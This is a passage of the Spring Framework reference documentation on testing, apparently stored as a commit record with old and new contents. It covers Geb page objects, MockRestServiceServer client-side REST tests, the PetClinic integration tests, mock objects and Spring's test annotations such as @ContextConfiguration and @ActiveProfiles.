to CreateMessagePage
----

We also have an `at` closure that determines whether we are at the specified page. It should return
`true` if we are on the correct page.
This is why we can assert that we are on the correct
page as follows.

[source,groovy]
----
then:
at CreateMessagePage
errors.contains('This field is required.')
----

[NOTE]
====
We use an assertion in the closure, so that we can determine where things went wrong if
we were at the wrong page.
====

Next we create a `content` closure that specifies all the areas of interest within the page.
We can use a
http://www.gebish.org/manual/current/intro.html#the_jquery_ish_navigator_api[jQuery-ish Navigator API]
to select the content we are interested in.

Finally, we can verify that a new message was created successfully.

[source,groovy]
----
then:
at ViewMessagePage
success == 'Successfully created a new message'
id
date
summary == expectedSummary
message == expectedMessage
----

For further details on how to get the most out of Geb, consult
http://www.gebish.org/manual/current/[The Book of Geb] user's manual.


[[spring-mvc-test-client]]
==== Client-Side REST Tests
Client-side tests can be used to test code that internally uses the `RestTemplate`.
The idea is to declare expected requests and to provide "stub" responses so that
you can focus on testing the code in isolation, i.e. without running a server.
Here is an example:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	RestTemplate restTemplate = new RestTemplate();

	MockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();
	mockServer.expect(requestTo("/greeting")).andRespond(withSuccess());

	// Test code that uses the above RestTemplate ...

	mockServer.verify();
----

In the above example, `MockRestServiceServer`, the central class for client-side REST
tests, configures the `RestTemplate` with a custom `ClientHttpRequestFactory` that
asserts actual requests against expectations and returns "stub" responses. In this case
we expect a request to "/greeting" and want to return a 200 response with
"text/plain" content. We can define additional expected requests and stub responses as
needed. When expected requests and stub responses are defined, the `RestTemplate` can be
used in client-side code as usual. At the end of testing, `mockServer.verify()` can be
used to verify that all expectations have been satisfied.
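
To actually produce the `"text/plain"` body mentioned above, the response creator can be
given explicit content and a media type, and the request can be matched on more than the
URL. A brief sketch (the greeting text is made up):

[source,java,indent=0]
----
	mockServer.expect(requestTo("/greeting"))
			.andExpect(method(HttpMethod.GET))
			.andRespond(withSuccess("Hello Spring!", MediaType.TEXT_PLAIN));
----
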
By default requests are expected in the order in which expectations were declared.
You can set the `ignoreExpectOrder` option when building the server, in which case
all expectations are checked (in order) to find a match for a given request. That
means requests are allowed to come in any order. Here is an example:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	server = MockRestServiceServer.bindTo(restTemplate).ignoreExpectOrder().build();
----

Even with unordered requests, by default each request is allowed to execute once only.
The `expect` method provides an overloaded variant that accepts an `ExpectedCount`
argument that specifies a count range, e.g. `once`, `manyTimes`, `max`, `min`,
`between`, and so on. Here is an example:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	RestTemplate restTemplate = new RestTemplate();

	MockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();
	mockServer.expect(times(2), requestTo("/foo")).andRespond(withSuccess());
	mockServer.expect(times(3), requestTo("/bar")).andRespond(withSuccess());

	// ...

	mockServer.verify();
----

Note that when `ignoreExpectOrder` is not set (the default), and therefore requests
are expected in order of declaration, that order only applies to the first of
any expected request. For example, if "/foo" is expected 2 times followed by "/bar"
3 times, then there should be a request to "/foo" before there is a request to "/bar",
but aside from that, subsequent "/foo" and "/bar" requests can come at any time.

As an alternative to all of the above, the client-side test support also provides a
`ClientHttpRequestFactory` implementation that can be configured into a `RestTemplate`
to bind it to a `MockMvc` instance. That allows processing requests using actual
server-side logic but without running a server. Here is an example:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	MockMvc mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
	this.restTemplate = new RestTemplate(new MockMvcClientHttpRequestFactory(mockMvc));

	// Test code that uses the above RestTemplate ...
----



[[spring-mvc-test-client-static-imports]]
===== Static Imports
Just like with server-side tests, the fluent API for client-side tests requires a few
static imports. Those are easy to find by searching __"MockRest*"__. Eclipse users
should add `"MockRestRequestMatchers.{asterisk}"` and `"MockRestResponseCreators.{asterisk}"`
as "favorite static members" in the Eclipse preferences under
__Java -> Editor -> Content Assist -> Favorites__.
That allows using content assist after typing the first character of the
static method name. Other IDEs (e.g. IntelliJ) may not require any additional
configuration. Just check the support for code completion on static members.

[[spring-mvc-test-client-resources]]
===== Further Examples of Client-side REST Tests
Spring MVC Test's own tests include
https://github.com/spring-projects/spring-framework/tree/master/spring-test/src/test/java/org/springframework/test/web/client/samples[example
tests] of client-side REST tests.



[[testing-examples-petclinic]]
=== PetClinic Example

The PetClinic application, available on
https://github.com/spring-projects/spring-petclinic[GitHub], illustrates several features
of the __Spring TestContext Framework__ in a JUnit environment.
Most test functionality\nis included in the `AbstractClinicTests`, for which a partial listing is shown below:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport static org.junit.Assert.assertEquals;\n\t\/\/ import ...\n\n\t**@ContextConfiguration**\n\tpublic abstract class AbstractClinicTests **extends AbstractTransactionalJUnit4SpringContextTests** {\n\n\t\t**@Autowired**\n\t\tprotected Clinic clinic;\n\n\t\t@Test\n\t\tpublic void getVets() {\n\t\t\tCollection<Vet> vets = this.clinic.getVets();\n\t\t\tassertEquals(\"JDBC query must show the same number of vets\",\n\t\t\t\t**super.countRowsInTable(\"VETS\")**, vets.size());\n\t\t\tVet v1 = EntityUtils.getById(vets, Vet.class, 2);\n\t\t\tassertEquals(\"Leary\", v1.getLastName());\n\t\t\tassertEquals(1, v1.getNrOfSpecialties());\n\t\t\tassertEquals(\"radiology\", (v1.getSpecialties().get(0)).getName());\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nNotes:\n\n* This test case extends the `AbstractTransactionalJUnit4SpringContextTests` class, from\n which it inherits configuration for Dependency Injection (through the\n `DependencyInjectionTestExecutionListener`) and transactional behavior (through the\n `TransactionalTestExecutionListener`).\n* The `clinic` instance variable -- the application object being tested -- is set by\n Dependency Injection through `@Autowired` semantics.\n* The `getVets()` method illustrates how you can use the inherited `countRowsInTable()`\n method to easily verify the number of rows in a given table, thus verifying correct\n behavior of the application code being tested. This allows for stronger tests and\n lessens dependency on the exact test data. For example, you can add additional rows in\n the database without breaking tests.\n* Like many integration tests that use a database, most of the tests in\n `AbstractClinicTests` depend on a minimum amount of data already in the database before\n the test cases run. Alternatively, you might choose to populate the database within the\n test fixture set up of your test cases -- again, within the same transaction as the\n tests.\n\nThe PetClinic application supports three data access technologies: JDBC, Hibernate, and\nJPA. By declaring `@ContextConfiguration` without any specific resource locations, the\n`AbstractClinicTests` class will have its application context loaded from the default\nlocation, `AbstractClinicTests-context.xml`, which declares a common `DataSource`.\nSubclasses specify additional context locations that must declare a\n`PlatformTransactionManager` and a concrete implementation of `Clinic`.\n\nFor example, the Hibernate implementation of the PetClinic tests contains the following\nimplementation. For this example, `HibernateClinicTests` does not contain a single line\nof code: we only need to declare `@ContextConfiguration`, and the tests are inherited\nfrom `AbstractClinicTests`. 
Because `@ContextConfiguration` is declared without any\nspecific resource locations, the __Spring TestContext Framework__ loads an application\ncontext from all the beans defined in `AbstractClinicTests-context.xml` (i.e., the\ninherited locations) and `HibernateClinicTests-context.xml`, with\n`HibernateClinicTests-context.xml` possibly overriding beans defined in\n`AbstractClinicTests-context.xml`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**\n\tpublic class HibernateClinicTests extends AbstractClinicTests { }\n----\n\nIn a large-scale application, the Spring configuration is often split across multiple\nfiles. Consequently, configuration locations are typically specified in a common base\nclass for all application-specific integration tests. Such a base class may also add\nuseful instance variables -- populated by Dependency Injection, naturally -- such as a\n`SessionFactory` in the case of an application using Hibernate.\n\nAs far as possible, you should have exactly the same Spring configuration files in your\nintegration tests as in the deployed environment. One likely point of difference\nconcerns database connection pooling and transaction infrastructure. If you are\ndeploying to a full-blown application server, you will probably use its connection pool\n(available through JNDI) and JTA implementation. Thus in production you will use a\n`JndiObjectFactoryBean` or `<jee:jndi-lookup>` for the `DataSource` and\n`JtaTransactionManager`. JNDI and JTA will not be available in out-of-container\nintegration tests, so you should use a combination like the Commons DBCP\n`BasicDataSource` and `DataSourceTransactionManager` or `HibernateTransactionManager`\nfor them. You can factor out this variant behavior into a single XML file, having the\nchoice between application server and a 'local' configuration separated from all other\nconfiguration, which will not vary between the test and production environments. In\naddition, it is advisable to use properties files for connection settings. 
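A minimal sketch of such a 'local' variant, expressed as a Java `@Configuration` class,
might look as follows (the `test-jdbc.properties` file, its property names, and the
`LocalTestInfrastructureConfig` class are illustrative, not part of the PetClinic
sample):

[source,java,indent=0]
----
	import javax.sql.DataSource;

	import org.apache.commons.dbcp.BasicDataSource;
	import org.springframework.beans.factory.annotation.Autowired;
	import org.springframework.context.annotation.Bean;
	import org.springframework.context.annotation.Configuration;
	import org.springframework.context.annotation.PropertySource;
	import org.springframework.core.env.Environment;
	import org.springframework.jdbc.datasource.DataSourceTransactionManager;
	import org.springframework.transaction.PlatformTransactionManager;

	@Configuration
	@PropertySource("classpath:test-jdbc.properties")
	public class LocalTestInfrastructureConfig {

		@Autowired
		private Environment env;

		// Commons DBCP pool instead of a JNDI DataSource lookup
		@Bean(destroyMethod = "close")
		public DataSource dataSource() {
			BasicDataSource dataSource = new BasicDataSource();
			dataSource.setDriverClassName(env.getProperty("jdbc.driver"));
			dataSource.setUrl(env.getProperty("jdbc.url"));
			dataSource.setUsername(env.getProperty("jdbc.username"));
			dataSource.setPassword(env.getProperty("jdbc.password"));
			return dataSource;
		}

		// local transaction management instead of JTA
		@Bean
		public PlatformTransactionManager transactionManager() {
			return new DataSourceTransactionManager(dataSource());
		}
	}
----

The corresponding production configuration would declare the same two bean names backed
by a JNDI lookup (e.g., `JndiObjectFactoryBean` or `<jee:jndi-lookup>`) and a
`JtaTransactionManager` instead.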
See the\nPetClinic application for an example.\n\n\n\n\n[[testing-resources]]\n== Further Resources\nConsult the following resources for more information about testing:\n\n* http:\/\/www.junit.org\/[JUnit]: \"__A programmer-oriented testing framework for Java__\".\n Used by the Spring Framework in its test suite.\n* http:\/\/testng.org\/[TestNG]: A testing framework inspired by JUnit with added support\n for annotations, test groups, data-driven testing, distributed testing, etc.\n* http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ]: \"__Fluent assertions for Java__\"\n including support for Java 8 lambdas, streams, etc.\n* http:\/\/en.wikipedia.org\/wiki\/Mock_Object[Mock Objects]: Article in Wikipedia.\n* http:\/\/www.mockobjects.com\/[MockObjects.com]: Web site dedicated to mock objects, a\n technique for improving the design of code within test-driven development.\n* http:\/\/mockito.org\/[Mockito]: Java mock library based on the\n http:\/\/xunitpatterns.com\/Test%20Spy.html[test spy] pattern.\n* http:\/\/www.easymock.org\/[EasyMock]: Java library \"__that provides Mock Objects for\n interfaces (and objects through the class extension) by generating them on the fly\n using Java's proxy mechanism.__\" Used by the Spring Framework in its test suite.\n* http:\/\/www.jmock.org\/[JMock]: Library that supports test-driven development of Java\n code with mock objects.\n* http:\/\/dbunit.sourceforge.net\/[DbUnit]: JUnit extension (also usable with Ant and\n Maven) targeted for database-driven projects that, among other things, puts your\n database into a known state between test runs.\n* http:\/\/grinder.sourceforge.net\/[The Grinder]: Java load testing framework.\n\n","old_contents":"[[testing]]\n= Testing\n\n[partintro]\n--\nThe adoption of the test-driven-development (TDD) approach to software\ndevelopment is certainly advocated by the Spring team, and so coverage of Spring's\nsupport for integration testing is covered (alongside best practices for unit testing).\nThe Spring team has found that the correct use of IoC certainly does make both unit and\nintegration testing easier (in that the presence of setter methods and appropriate\nconstructors on classes makes them easier to wire together in a test without having to\nset up service locator registries and suchlike)... the chapter dedicated solely to\ntesting will hopefully convince you of this as well.\n--\n\n\n[[testing-introduction]]\n== Introduction to Spring Testing\nTesting is an integral part of enterprise software development. This chapter focuses on\nthe value-add of the IoC principle to <<unit-testing,unit testing>> and on the benefits\nof the Spring Framework's support for <<integration-testing,integration testing>>. __(A\nthorough treatment of testing in the enterprise is beyond the scope of this reference\nmanual.)__\n\n\n\n\n[[unit-testing]]\n== Unit Testing\nDependency Injection should make your code less dependent on the container than it would\nbe with traditional Java EE development. The POJOs that make up your application should\nbe testable in JUnit or TestNG tests, with objects simply instantiated using the `new`\noperator, __without Spring or any other container__. You can use <<mock-objects,mock\nobjects>> (in conjunction with other valuable testing techniques) to test your code in\nisolation. If you follow the architecture recommendations for Spring, the resulting\nclean layering and componentization of your codebase will facilitate easier unit\ntesting. 
For example, you can test service layer objects by stubbing or mocking DAO or\nRepository interfaces, without needing to access persistent data while running unit\ntests.\n\nTrue unit tests typically run extremely quickly, as there is no runtime infrastructure\nto set up. Emphasizing true unit tests as part of your development methodology will\nboost your productivity. You may not need this section of the testing chapter to help\nyou write effective unit tests for your IoC-based applications. For certain unit testing\nscenarios, however, the Spring Framework provides the following mock objects and testing\nsupport classes.\n\n\n\n[[mock-objects]]\n=== Mock Objects\n\n\n[[mock-objects-env]]\n==== Environment\nThe `org.springframework.mock.env` package contains mock implementations of the\n`Environment` and `PropertySource` abstractions (see <<beans-definition-profiles>>\nand <<beans-property-source-abstraction>>). `MockEnvironment` and\n`MockPropertySource` are useful for developing __out-of-container__ tests for code that\ndepends on environment-specific properties.\n\n\n[[mock-objects-jndi]]\n==== JNDI\nThe `org.springframework.mock.jndi` package contains an implementation of the JNDI SPI,\nwhich you can use to set up a simple JNDI environment for test suites or stand-alone\napplications. If, for example, JDBC ++DataSource++s get bound to the same JNDI names in\ntest code as within a Java EE container, you can reuse both application code and\nconfiguration in testing scenarios without modification.\n\n\n[[mock-objects-servlet]]\n==== Servlet API\nThe `org.springframework.mock.web` package contains a comprehensive set of Servlet API\nmock objects, which are useful for testing web contexts, controllers, and filters. These\nmock objects are targeted at usage with Spring's Web MVC framework and are generally more\nconvenient to use than dynamic mock objects such as http:\/\/www.easymock.org[EasyMock] or\nalternative Servlet API mock objects such as http:\/\/www.mockobjects.com[MockObjects]. As of\nSpring Framework 4.0, the set of mocks in the `org.springframework.mock.web` package is\nbased on the Servlet 3.0 API.\n\nFor thorough integration testing of your Spring MVC and REST ++Controller++s in\nconjunction with your `WebApplicationContext` configuration for Spring MVC, see the\n<<spring-mvc-test-framework,_Spring MVC Test Framework_>>.\n\n\n[[mock-objects-portlet]]\n==== Portlet API\nThe `org.springframework.mock.web.portlet` package contains a set of Portlet API mock\nobjects, targeted at usage with Spring's Portlet MVC framework.\n\n\n\n[[unit-testing-support-classes]]\n=== Unit Testing support Classes\n\n\n[[unit-testing-utilities]]\n==== General testing utilities\nThe `org.springframework.test.util` package contains several general purpose utilities\nfor use in unit and integration testing.\n\n`ReflectionTestUtils` is a collection of reflection-based utility methods. 
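For example, a test can use `ReflectionTestUtils` to manipulate a `private` field
directly (a minimal sketch; the `Person` class and its `id` field are illustrative):

[source,java,indent=0]
----
	import static org.junit.Assert.assertEquals;

	import org.junit.Test;
	import org.springframework.test.util.ReflectionTestUtils;

	public class PersonReflectionTests {

		@Test
		public void setIdViaPrivateField() {
			Person person = new Person();

			// set the private 'id' field without requiring a public setter
			ReflectionTestUtils.setField(person, "id", 42L);

			assertEquals(42L, ReflectionTestUtils.getField(person, "id"));
		}
	}
----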
Developers use\nthese methods in testing scenarios where they need to change the value of a constant, set\na non-`public` field, invoke a non-`public` setter method, or invoke a non-`public`\n_configuration_ or _lifecycle_ callback method when testing application code involving\nuse cases such as the following.\n\n* ORM frameworks such as JPA and Hibernate that condone `private` or `protected` field\n access as opposed to `public` setter methods for properties in a domain entity.\n* Spring's support for annotations such as `@Autowired`, `@Inject`, and `@Resource`,\n which provides dependency injection for `private` or `protected` fields, setter\n methods, and configuration methods.\n* Use of annotations such as `@PostConstruct` and `@PreDestroy` for lifecycle callback\n methods.\n\n`AopTestUtils` is a collection of AOP-related utility methods. These methods can be used\nto obtain a reference to the underlying target object hidden behind one or more Spring\nproxies. For example, if you have configured a bean as a dynamic mock using a library\nlike EasyMock or Mockito and the mock is wrapped in a Spring proxy, you may need direct\naccess to the underlying mock in order to configure expectations on it and perform\nverifications. For Spring's core AOP utilities, see `AopUtils` and `AopProxyUtils`.\n\n\n\n[[unit-testing-spring-mvc]]\n==== Spring MVC\nThe `org.springframework.test.web` package contains `ModelAndViewAssert`, which you can\nuse in combination with JUnit, TestNG, or any other testing framework for unit tests\ndealing with Spring MVC `ModelAndView` objects.\n\n.Unit testing Spring MVC Controllers\n[TIP]\n====\nTo unit test your Spring MVC ++Controller++s as POJOs, use `ModelAndViewAssert` combined\nwith `MockHttpServletRequest`, `MockHttpSession`, and so on from Spring's\n<<mock-objects-servlet, Servlet API mocks>>. For thorough integration testing of your\nSpring MVC and REST ++Controller++s in conjunction with your `WebApplicationContext`\nconfiguration for Spring MVC, use the <<spring-mvc-test-framework,_Spring MVC Test\nFramework_>> instead.\n====\n\n\n\n\n[[integration-testing]]\n== Integration Testing\n\n\n\n[[integration-testing-overview]]\n=== Overview\nIt is important to be able to perform some integration testing without requiring\ndeployment to your application server or connecting to other enterprise infrastructure.\nThis will enable you to test things such as:\n\n* The correct wiring of your Spring IoC container contexts.\n* Data access using JDBC or an ORM tool. This would include such things as the\n correctness of SQL statements, Hibernate queries, JPA entity mappings, etc.\n\nThe Spring Framework provides first-class support for integration testing in the\n`spring-test` module. The name of the actual JAR file might include the release version\nand might also be in the long `org.springframework.test` form, depending on where you\nget it from (see the <<dependency-management,section on Dependency Management>> for an\nexplanation). This library includes the `org.springframework.test` package, which\ncontains valuable classes for integration testing with a Spring container. This testing\ndoes not rely on an application server or other deployment environment. 
Such tests are\nslower to run than unit tests but much faster than the equivalent Selenium tests or remote\ntests that rely on deployment to an application server.\n\nIn Spring 2.5 and later, unit and integration testing support is provided in the form of\nthe annotation-driven <<testcontext-framework,Spring TestContext Framework>>. The\nTestContext framework is agnostic of the actual testing framework in use, thus allowing\ninstrumentation of tests in various environments including JUnit, TestNG, and so on.\n\n\n\n[[integration-testing-goals]]\n=== Goals of Integration Testing\nSpring's integration testing support has the following primary goals:\n\n* To manage <<testing-ctx-management,Spring IoC container caching>> between test\n execution.\n* To provide <<testing-fixture-di,Dependency Injection of test fixture instances>>.\n* To provide <<testing-tx,transaction management>> appropriate to integration testing.\n* To supply <<testing-support-classes,Spring-specific base classes>> that assist\n developers in writing integration tests.\n\nThe next few sections describe each goal and provide links to implementation and\nconfiguration details.\n\n\n[[testing-ctx-management]]\n==== Context management and caching\nThe Spring TestContext Framework provides consistent loading of Spring\n++ApplicationContext++s and ++WebApplicationContext++s as well as caching of those\ncontexts. Support for the caching of loaded contexts is important, because startup time\ncan become an issue -- not because of the overhead of Spring itself, but because the\nobjects instantiated by the Spring container take time to instantiate. For example, a\nproject with 50 to 100 Hibernate mapping files might take 10 to 20 seconds to load the\nmapping files, and incurring that cost before running every test in every test fixture\nleads to slower overall test runs that reduce developer productivity.\n\nTest classes typically declare either an array of __resource locations__ for XML or Groovy\nconfiguration metadata -- often in the classpath -- or an array of __annotated classes__\nthat is used to configure the application. These locations or classes are the same as or\nsimilar to those specified in `web.xml` or other configuration files for production\ndeployments.\n\nBy default, once loaded, the configured `ApplicationContext` is reused for each test.\nThus the setup cost is incurred only once per test suite, and subsequent test execution\nis much faster. In this context, the term __test suite__ means all tests run in the same\nJVM -- for example, all tests run from an Ant, Maven, or Gradle build for a given\nproject or module. In the unlikely case that a test corrupts the application context and\nrequires reloading -- for example, by modifying a bean definition or the state of an\napplication object -- the TestContext framework can be configured to reload the\nconfiguration and rebuild the application context before executing the next test.\n\nSee <<testcontext-ctx-management>> and <<testcontext-ctx-management-caching>> with the\nTestContext framework.\n\n\n[[testing-fixture-di]]\n==== Dependency Injection of test fixtures\nWhen the TestContext framework loads your application context, it can optionally\nconfigure instances of your test classes via Dependency Injection. This provides a\nconvenient mechanism for setting up test fixtures using preconfigured beans from your\napplication context. 
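For example, a test class might simply declare an `@Autowired` field for the bean under
test (a minimal sketch; the `TitleRepository` bean and its configuration file are
illustrative):

[source,java,indent=0]
----
	import static org.junit.Assert.assertNotNull;

	import org.junit.Test;
	import org.junit.runner.RunWith;
	import org.springframework.beans.factory.annotation.Autowired;
	import org.springframework.test.context.ContextConfiguration;
	import org.springframework.test.context.junit4.SpringRunner;

	@RunWith(SpringRunner.class)
	@ContextConfiguration("/repository-config.xml")
	public class TitleRepositoryTests {

		// test fixture injected from the configured ApplicationContext
		@Autowired
		private TitleRepository titleRepository;

		@Test
		public void findById() {
			assertNotNull(titleRepository.findById(1L));
		}
	}
----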
A strong benefit here is that you can reuse application contexts\nacross various testing scenarios (e.g., for configuring Spring-managed object graphs,\ntransactional proxies, ++DataSource++s, etc.), thus avoiding the need to duplicate\ncomplex test fixture setup for individual test cases.\n\nAs an example, consider the scenario where we have a class, `HibernateTitleRepository`,\nthat implements data access logic for a `Title` domain entity. We want to write\nintegration tests that test the following areas:\n\n* The Spring configuration: basically, is everything related to the configuration of the\n `HibernateTitleRepository` bean correct and present?\n* The Hibernate mapping file configuration: is everything mapped correctly, and are the\n correct lazy-loading settings in place?\n* The logic of the `HibernateTitleRepository`: does the configured instance of this\n class perform as anticipated?\n\nSee dependency injection of test fixtures with the <<testcontext-fixture-di,TestContext\nframework>>.\n\n\n[[testing-tx]]\n==== Transaction management\nOne common issue in tests that access a real database is their effect on the state of\nthe persistence store. Even when you're using a development database, changes to the\nstate may affect future tests. Also, many operations -- such as inserting or modifying\npersistent data -- cannot be performed (or verified) outside a transaction.\n\nThe TestContext framework addresses this issue. By default, the framework will create\nand roll back a transaction for each test. You simply write code that can assume the\nexistence of a transaction. If you call transactionally proxied objects in your tests,\nthey will behave correctly, according to their configured transactional semantics. In\naddition, if a test method deletes the contents of selected tables while running within\nthe transaction managed for the test, the transaction will roll back by default, and the\ndatabase will return to its state prior to execution of the test. Transactional support\nis provided to a test via a `PlatformTransactionManager` bean defined in the test's\napplication context.\n\nIf you want a transaction to commit -- unusual, but occasionally useful when you want a\nparticular test to populate or modify the database -- the TestContext framework can be\ninstructed to cause the transaction to commit instead of roll back via the\n<<integration-testing-annotations, `@Commit`>> annotation.\n\nSee transaction management with the <<testcontext-tx,TestContext framework>>.\n\n\n[[testing-support-classes]]\n==== Support classes for integration testing\nThe Spring TestContext Framework provides several `abstract` support classes that\nsimplify the writing of integration tests. These base test classes provide well-defined\nhooks into the testing framework as well as convenient instance variables and methods,\nwhich enable you to access:\n\n* The `ApplicationContext`, for performing explicit bean lookups or testing the state of\n the context as a whole.\n* A `JdbcTemplate`, for executing SQL statements to query the database. Such queries can\n be used to confirm database state both __prior to__ and __after__ execution of\n database-related application code, and Spring ensures that such queries run in the\n scope of the same transaction as the application code. 
When used in conjunction with\n an ORM tool, be sure to avoid <<testcontext-tx-false-positives,false positives>>.\n\nIn addition, you may want to create your own custom, application-wide superclass with\ninstance variables and methods specific to your project.\n\nSee support classes for the <<testcontext-support-classes,TestContext framework>>.\n\n\n\n[[integration-testing-support-jdbc]]\n=== JDBC Testing Support\nThe `org.springframework.test.jdbc` package contains `JdbcTestUtils`, which is a\ncollection of JDBC related utility functions intended to simplify standard database\ntesting scenarios. Specifically, `JdbcTestUtils` provides the following static utility\nmethods.\n\n* `countRowsInTable(..)`: counts the number of rows in the given table\n* `countRowsInTableWhere(..)`: counts the number of rows in the given table, using\nthe provided `WHERE` clause\n* `deleteFromTables(..)`: deletes all rows from the specified tables\n* `deleteFromTableWhere(..)`: deletes rows from the given table, using the provided\n`WHERE` clause\n* `dropTables(..)`: drops the specified tables\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nprovide convenience methods which delegate to the aforementioned methods in\n`JdbcTestUtils`.__\n\nThe `spring-jdbc` module provides support for configuring and launching an embedded\ndatabase which can be used in integration tests that interact with a database. For\ndetails, see <<jdbc-embedded-database-support>> and\n<<jdbc-embedded-database-dao-testing>>.\n\n\n\n[[integration-testing-annotations]]\n=== Annotations\n\n\n[[integration-testing-annotations-spring]]\n==== Spring Testing Annotations\nThe Spring Framework provides the following set of __Spring-specific__ annotations that\nyou can use in your unit and integration tests in conjunction with the TestContext\nframework. Refer to the corresponding javadocs for further information, including\ndefault attribute values, attribute aliases, and so on.\n\n* `@ContextConfiguration`\n\n+\n\nDefines class-level metadata that is used to determine how to load and configure an\n`ApplicationContext` for integration tests. Specifically, `@ContextConfiguration`\ndeclares the application context resource `locations` or the annotated `classes`\nthat will be used to load the context.\n\n+\n\nResource locations are typically XML configuration files or Groovy scripts located in\nthe classpath; whereas, annotated classes are typically `@Configuration` classes. 
However,
resource locations can also refer to files and scripts in the file system, and annotated
classes can be component classes, etc.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@ContextConfiguration**("/test-config.xml")
	public class XmlApplicationContextTests {
		// class body...
	}
----

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@ContextConfiguration**(**classes** = TestConfig.class)
	public class ConfigClassApplicationContextTests {
		// class body...
	}
----

+

As an alternative or in addition to declaring resource locations or annotated classes,
`@ContextConfiguration` may be used to declare `ApplicationContextInitializer` classes.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@ContextConfiguration**(**initializers** = CustomContextInitializer.class)
	public class ContextInitializerTests {
		// class body...
	}
----

+

`@ContextConfiguration` may optionally be used to declare the `ContextLoader` strategy
as well. Note, however, that you typically do not need to explicitly configure the
loader since the default loader supports either resource `locations` or annotated
`classes` as well as `initializers`.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@ContextConfiguration**(**locations** = "/test-context.xml", **loader** = CustomContextLoader.class)
	public class CustomLoaderXmlApplicationContextTests {
		// class body...
	}
----

+

[NOTE]
====
`@ContextConfiguration` provides support for __inheriting__ resource locations or
configuration classes as well as context initializers declared by superclasses by
default.
====

+

See <<testcontext-ctx-management>> and the `@ContextConfiguration` javadocs for
further details.

* `@WebAppConfiguration`

+

A class-level annotation that is used to declare that the `ApplicationContext` loaded
for an integration test should be a `WebApplicationContext`. The mere presence of
`@WebAppConfiguration` on a test class ensures that a `WebApplicationContext` will be
loaded for the test, using the default value of `"file:src/main/webapp"` for the path to
the root of the web application (i.e., the __resource base path__). The resource base
path is used behind the scenes to create a `MockServletContext` which serves as the
`ServletContext` for the test's `WebApplicationContext`.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration
	**@WebAppConfiguration**
	public class WebAppTests {
		// class body...
	}
----

+

To override the default, specify a different base resource path via the __implicit__
`value` attribute. Both `classpath:` and `file:` resource prefixes are supported. If no
resource prefix is supplied, the path is assumed to be a file system resource.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration
	**@WebAppConfiguration("classpath:test-web-resources")**
	public class WebAppTests {
		// class body...
	}
----

+

Note that `@WebAppConfiguration` must be used in conjunction with
`@ContextConfiguration`, either within a single test class or within a test class
hierarchy. See the `@WebAppConfiguration` javadocs for further details.

* `@ContextHierarchy`

+

A class-level annotation that is used to define a hierarchy of ++ApplicationContext++s
for integration tests.
`@ContextHierarchy` should be declared with a list of one or more\n`@ContextConfiguration` instances, each of which defines a level in the context\nhierarchy. The following examples demonstrate the use of `@ContextHierarchy` within a\nsingle test class; however, `@ContextHierarchy` can also be used within a test class\nhierarchy.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class ContextHierarchyTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = AppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class WebIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nIf you need to merge or override the configuration for a given level of the context\nhierarchy within a test class hierarchy, you must explicitly name that level by\nsupplying the same value to the `name` attribute in `@ContextConfiguration` at each\ncorresponding level in the class hierarchy. See\n<<testcontext-ctx-management-ctx-hierarchies>> and the `@ContextHierarchy` javadocs\nfor further examples.\n\n* `@ActiveProfiles`\n\n+\n\nA class-level annotation that is used to declare which __bean definition profiles__\nshould be active when loading an `ApplicationContext` for test classes.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**(\"dev\")\n\tpublic class DeveloperTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**({\"dev\", \"integration\"})\n\tpublic class DeveloperIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[NOTE]\n====\n`@ActiveProfiles` provides support for __inheriting__ active bean definition profiles\ndeclared by superclasses by default. It is also possible to resolve active bean\ndefinition profiles programmatically by implementing a custom\n<<testcontext-ctx-management-env-profiles-ActiveProfilesResolver,`ActiveProfilesResolver`>>\nand registering it via the `resolver` attribute of `@ActiveProfiles`.\n====\n\n+\n\nSee <<testcontext-ctx-management-env-profiles>> and the `@ActiveProfiles` javadocs\nfor examples and further details.\n\n* `@TestPropertySource`\n\n+\n\nA class-level annotation that is used to configure the locations of properties files and\ninlined properties to be added to the set of `PropertySources` in the `Environment` for\nan `ApplicationContext` loaded for an integration test.\n\n+ \n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. 
